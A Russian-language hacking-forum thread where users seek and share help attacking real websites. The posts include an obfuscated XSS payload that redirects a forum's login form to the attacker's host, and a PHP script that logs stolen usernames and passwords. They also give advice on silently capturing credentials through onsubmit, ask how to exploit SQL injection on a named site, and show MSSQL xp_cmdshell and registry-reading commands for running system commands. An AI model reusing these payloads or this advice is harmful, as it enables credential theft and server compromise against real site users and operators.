Попробуйте так. Может там нормализатор ссылок обрезает http:// Code: <script>String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 108, 115, 102, 111, 114, 109, 39, 41, 46, 97, 99, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 1052, 1086, 1081, 1061, 1086, 1089, 1090, 1080, 1085, 1075, 49, 46, 114, 117, 47, 98, 97, 115, 101, 46, 112, 104, 112, 63, 34, 59);</script>
Редирект не помагает,вот как происходит;мой хостинг где лежит base.php "МойХостинг.ru/base.php" их сайт "УязвимыйСайт.ru/forum/forum.php" когда нажимаю ВХОД то ничего не происходит,даже в профиль не заходит,смотрю через чарльз что происходит там,и вижу что вместо "МойХостинг.ru/base.php" становится так" УязвимыйСайт.ru/base.php" и в пакете есть логин и пас,но ничего не происходит((( вот сам base.php ---------------------------------------------------------------- <? $login = $_POST['username']; $pass = $_POST['password']; $file = "log.txt"; $fop = fopen("$file","a+"); fwrite($fop,"$login;$pass\n"); fclose($fop); header('Location: http://УязвимыйСайт/forum/forum.php'); ?> ------------------------------------------------------------------- Я сначала ввожу скрипт вместо ника <script src="http://МойСайт.ru/1.js"></script> а в 1.js лежит document.getElementById('lsform').action="http://МойСайт.ru/base.php?"; --------------------------------------------------------------------
Скрипт, скорее всего, нужно выполнять в document onload. Возможно на странице есть ещё какие-то скрипты. Правильнее было бы сделать скрипт для события onsubmit, который без двойных заметных редиректов отправлял данные к нам на хост. Если XSS не в login.php, пишут скрипты, которые остаются на странице даже после того, как юзер её покинет переходом по ссылке на другую.
<form method="post" autocomplete="off" id="lsform" action="member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes" onsubmit="return lsSubmit();"> Я для этой формы скрипт подключаю,есть еще js на их сайте,выглядит так <div class="hdc cl"><script src="logging.js?crR" type="text/javascript"></script> А в нем вот это Code: function lsSubmit(op) { var op = !op ? 0 : op; if(op) { $('lsform').cookietime.value = 2592000; } if($('ls_username').value == '' || $('ls_password').value == '') { showWindow('login', 'member.php?mod=logging&action=login' + (op ? '&cookietime=1' : '')); } else { ajaxpost('lsform', 'return_ls', 'return_ls'); } return false; } function errorhandle_ls(str, param) { if(!param['type']) { showError(str); } } Еще к сылке добавляется inajax, вот так /base.php?&inajax И уязвимость Активная,и находится где форма авторизации
Может кто подсказать что можно из этого вытащить? вот сайт http://www.rostof.ru/article.php?chapter=&id= а вот скрин скана http://hkar.ru/CVkO
Здравствуйте. заранее простите за не корректную формулировку вопроса. Имею sql инъекцию, права рут, ОС виндус, как выполнить команду cmd?
Заливаите шелл и если нужные функции в пхп не отключены то через консоль выполняите нужные вам команды
шел залить можно. Но мне интересно именно это. как через sqlmap делать я более мение знаю, а вот как ручками не знаю вообще. Надо привыкать в полевым условиям, когда только я и сайт, а между нами браузер.
это запись. а мне именно выполнение cmd команды надо. Ладно , сделаю выложу то что мне надо было, не могу объяснить ))
Да мне кажется что проблема даже не в "onsubmit="return lsSubmit();" Пробую сделать даже так для чекбокса,что бы удалить disabled="disabled <input type="checkbox" name="htmlon" id="htmlon" class="pc" value="0" disabled="disabled"> <script>document.getElementById ('htmlon').removeAttribute ('disabled');</script> И тоже не выходит cсылка делается такой /forum/h%3C/a%3E%3C/li%3E%3Cli%20title= Я вот что еще нашел на странице <img src="static/image/common/online_home.gif" alt="icon" /> <a href="home.php?mod=space&uid=23180">8<script src="h</a> </li> <li title="Время: 11:05"> ------------------------------------------------------------------- <img src="static/image/common/online_home.gif" alt="icon" /> <a href="home.php?mod=space&uid=22137">Крест</a> </li> <li title="Время: 11:05">
sqlmap так и делает. льет файл с system() или другими и к ним уже обращается, как к шеллу, парся вывод. в postgresql 9.3 и mssql есть функция выполнения системных команд. это то, о чем вы говорите? какая dbms? mssql?
Выполнение команд (mysql) - либо через сторонний интерпретатор (php), либо через эксплоит, либо этим способом (для SQL-инъекций не подойдет): https://forum.antichat.net/threads/324318/
Вот, это я имел в виду. http://www.sqlinjectionwiki.com/Cat...eat-sheet/#Enablingxp_cmdshellinSQLServer2005 Code: XEC master.dbo.xp_cmdshell "cmd.exe реж C: ' а про вот это я забыл, что такое тоже можно Code: xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite Exec xp_regread HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Параметры", "nullsessionshares" Exec xp_regenumvalues HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ SNMP \ Параметры \ validcommunitie
т. е. нужно было просто с самого начала сказать, что у вас mssql. https://rdot.org/forum/showthread.php?t=826 читать абзац "выполнение команд"
Незачем фишинг ,левые сервера и уж темболее си.Если сторед xss на тойже страничке что и форма авторизации то все легко перехватывается. Нужен будет сниффер лишь чтобы заместо куков ловить логины и пароли. По реализации подсказать в лс могу
Нашел такое www.site.ru/api.php?appId=APP324233456&cb=&[email protected]&pwd=123123&fn=1 это отвечает за вход на сайт,когда нажимаю ENTER то оно выдает такое ({"email":"[email protected]","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"}) в параметре cb= можно прописать любой html код,например (<input name="txt_email20" type="text" class="input_login">) то он исполнится ,и будет выглядеть так тут будет форма ({"email":"[email protected]","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"}) И ява скрипты не исполняются почему то. Что можно с этим сделать?